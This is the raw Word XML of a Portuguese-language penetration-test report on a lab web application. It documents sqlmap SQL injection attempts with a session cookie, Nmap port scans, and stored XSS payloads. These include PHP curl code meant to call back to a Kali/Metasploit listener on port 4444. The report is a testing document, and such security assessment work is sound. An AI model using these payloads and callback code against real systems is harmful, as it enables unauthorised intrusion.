      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” utilizado para obter o nome do banco de dados utilizado pela aplica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C5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="005967D5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F52870" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. A figur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12</w:t>
      </w:r>
      <w:r w:rsidR="00F52870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mostram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 a execução e </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001A5B8E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as inúmeras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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82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="001A5B8E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s de injeção executadas pela ferramenta automatizada</w:t>
      </w:r>
      <w:r w:rsidR="00F52870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F52870" w:rsidRPr="00F15F82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EC5D2B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42116BEA" wp14:editId="3165C341">
            <wp:extent cx="5476240" cy="407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12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Resultado aplicaç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QL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vi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48383A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Repetir a ação d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e aumentar o nível de heurística aplicada pel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injeção de SQL para o valor máximo: 5.</w:t>
      </w:r>
      <w:r w:rsidR="00870818" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com o incremento no valor de heurística, aumentaram também a profundidade da árvore de decisão usada nos ataques.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ntrada: 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>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="002D4365">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>nomeSistema</w:t>
        </w:r>
        <w:r w:rsidRPr="00F15F82">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" –b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10D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>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -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db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 xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="gram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level 5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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">./sqlmap.py” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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-u” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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--cookie” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current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15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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 “--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>level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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para aumentar o nível da heurística utilizada no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRPr="00F15F82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870" w:rsidRPr="00F15F82" w:rsidRDefault="00F52870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lastRenderedPageBreak/>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F52870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se que a tela de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ossível descobrir o nome do banco de dados uti</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005967D5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Embora tendo aumentado o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e por consequência não foi possível descobrir o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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503644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3.1 Atividade</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F52870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nálise do Servidor via </w:t>
      </w:r>
      <w:proofErr w:type="spell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Nmap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24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Após o problema de corrupção do sistema operacional do servidor de dados da aplicação, houve mudanças na arquitetura do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de dad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9317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varrer as portas 1 a 65.535 do sistema usando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TCP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sV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V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” é utilizado para realizar o SYN e buscar a versão do software rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-p” indica quais portas a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erem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usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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4275B" w:rsidRPr="00F15F82" w:rsidRDefault="0074275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F15F82" w:rsidRDefault="00EC5D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766745B0" wp14:editId="72E959C2">
            <wp:extent cx="5400040" cy="411416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13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Portas TCP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5F470B" w:rsidRPr="00F15F82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470B" w:rsidRPr="00F15F82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Serviços Encontrados na figura acima: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470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470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B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b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Microsoft Windows RPC - Ferramenta semelhante ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TeamViewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que conecta o computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B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Microsoft Windows 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microsoft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-d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Ferramenta que auxilia a implantação de imagens em uma distribuição Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B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pach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httpd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– Servidor Web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B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Microsoft Windows 98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netbios-ss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Api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que fornece serviços relacionados com a camada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Tansport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o modelo OSI para permitir a comunicação de aplicativos locais.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B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Microsoft Firmwar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Pp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– Protocolo de transferência ponto a ponto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F470B" w:rsidRPr="00F15F82" w:rsidRDefault="005F470B" w:rsidP="0063043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ind w:left="24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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wbt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-server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= serviço de gerenciamento de hosts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  <w:r w:rsidR="003F480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9317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Varredura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varrer as portas 1 a 65.535 do sistema usando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ca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e portas UDP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nma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sU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p 1-65535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IP_do_servidor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3"/>
        </w:num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U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” indica o uso do detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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 xml:space="preserve">“-p” indicará quais portas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devem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ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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informa o IP onde está hospedada a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B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proofErr w:type="gramStart"/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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0074275B" w:rsidRPr="00F15F82" w:rsidRDefault="0074275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C5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D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D256C2C" wp14:editId="1FB3C833">
            <wp:extent cx="5467350" cy="3654425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14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– Portas UDP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escaneadas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el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Nmap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A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A6607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66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A6607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Serviços Encontrados na imagem acima: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netbios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-n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responsável pelo registro de nomes de aplicação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[4]; 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-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dgm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serviço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datagram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NetBio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;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snmp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[5] - gerenciamento de redes;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microsoft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-d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protocol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compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00F15F82" w:rsidRDefault="00915C31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L2TP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F8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15F8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(Protocolo de Encapsulamento de Camada </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F8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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F8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  <w:r w:rsidRPr="00F15F82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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="0063043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nat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-t-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ik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- protocolo de tradução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p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A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072" w:rsidP="0063043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ind w:left="24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ntp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[3] - protocolo de sincronização de relógios usando UDP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2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3.2 XSS – Cadastro Lotes de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:b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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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23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 e 10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 xml:space="preserve">Descobrir se os campos da tela de Cadastro Lotes de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0049317F" w:rsidRPr="00F15F82" w:rsidRDefault="0049317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Inserir em um dos campos o seguinte código:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B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&lt;script&gt; </w:t>
      </w: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alert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(</w:t>
      </w:r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“oi”);&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no campo Marca/Fabricante</w:t>
      </w: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49317F" w:rsidRPr="00F15F82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49317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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que haja um tratamento e esse código não seja executado quando a página carregar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Caso a aplicação não realiz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um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dado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evem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roduzir um pop-up com o texto “oi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6071F5" w:rsidRPr="00F15F82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D76012" w:rsidRPr="00F15F82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8C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Foi constatado que a aplicação não está fazendo o tratamento adequado para a </w:t>
      </w:r>
      <w:r w:rsidR="0049317F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inserção de códigos mal-</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intencionados nos campos da tela em questão.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1742" w:rsidRPr="00F15F82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C1742" w:rsidRPr="00F15F82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4F141BE0" wp14:editId="517E47ED">
            <wp:extent cx="5400040" cy="3998595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15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– Resultado teste XS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 partir da máquina virtual que usa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Kali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Linux, abrir uma conexão do </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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fazendo uso de um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acessar o sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
      <w:r w:rsidR="0049317F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49317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esperado é que</w:t>
      </w:r>
      <w:r w:rsidR="00D46C6B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> os dados passados sejam devidamente tratado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na aplicação para impedir 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Passos utilizados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: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1. Utilizar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abrir um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porta 444 da máquina virtual onde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Kali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Linux está hospedado, usando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isponível em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Auxiliary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ulti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Handl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2. Usar um comando GET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abrir a conexão da máquina que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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com a máquina virtual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Kali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porta indicad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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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Comando a ser utilizado no XSS, o código abaixo tenta abrir uma conexão do tipo ‘GET’ com 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na porta 4444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&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">$curl =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in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'http://IP_do_servidor:4444')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exec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$curl)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close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$curl)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?&gt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Caso não haja o devido tratamento, o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aberto na porta 444 deve criar uma conexão entre a máquina que </w:t>
      </w:r>
      <w:r w:rsidR="008A79EE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">acessa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a aplicação no momento e a máquina onde está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Kali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Linux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         </w:t>
      </w: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. A sessão d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não foi aber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3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lterar o comando utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82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F15F82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para tentar descobrir o que impediu a sessão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ser aberta.</w:t>
      </w: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Que a aplicação realize o tratamento para impedir o comando de ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A40129" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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0129" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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0129" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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0129" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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0129" w:rsidRPr="00F15F82" w:rsidRDefault="00A4012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F15F82" w:rsidRDefault="00A4012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c</w:t>
      </w:r>
      <w:r w:rsidR="00D46C6B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ódig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abaixo tenta abrir uma conexão com o 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na porta 4444 e caso haja u erro exibe o problema num pop-up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&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">$curl =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curl_</w:t>
      </w:r>
      <w:proofErr w:type="gram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in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'http://IP_do_servidor:4444')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if(</w:t>
      </w:r>
      <w:proofErr w:type="gram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!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curl_exec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($curl)){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javascript:</w:t>
      </w:r>
      <w:proofErr w:type="gram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alert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curl_error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>($curl))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}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curl_close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($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curl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)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?&gt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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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4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07948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o contrário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 xml:space="preserve">das demais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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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s que utilizavam códigos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ph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, aqui foram utilizados códigos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uro, que os navegadores conseguem ler. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707948" w:rsidRPr="00F15F82" w:rsidRDefault="00707948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6E2559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esperado é que a aplicação </w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realiz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tratamento para impedir o código de ser executado.</w:t>
      </w:r>
      <w:r w:rsidR="00537F7B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E2559" w:rsidRPr="00F15F82" w:rsidRDefault="006E2559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37F7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XMLHttpReques</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006E2559" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e tenta realizar uma chamada A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jax do tipo GET para</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00F15F82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="00881DA5" w:rsidRPr="00F15F82">
        <w:rPr>
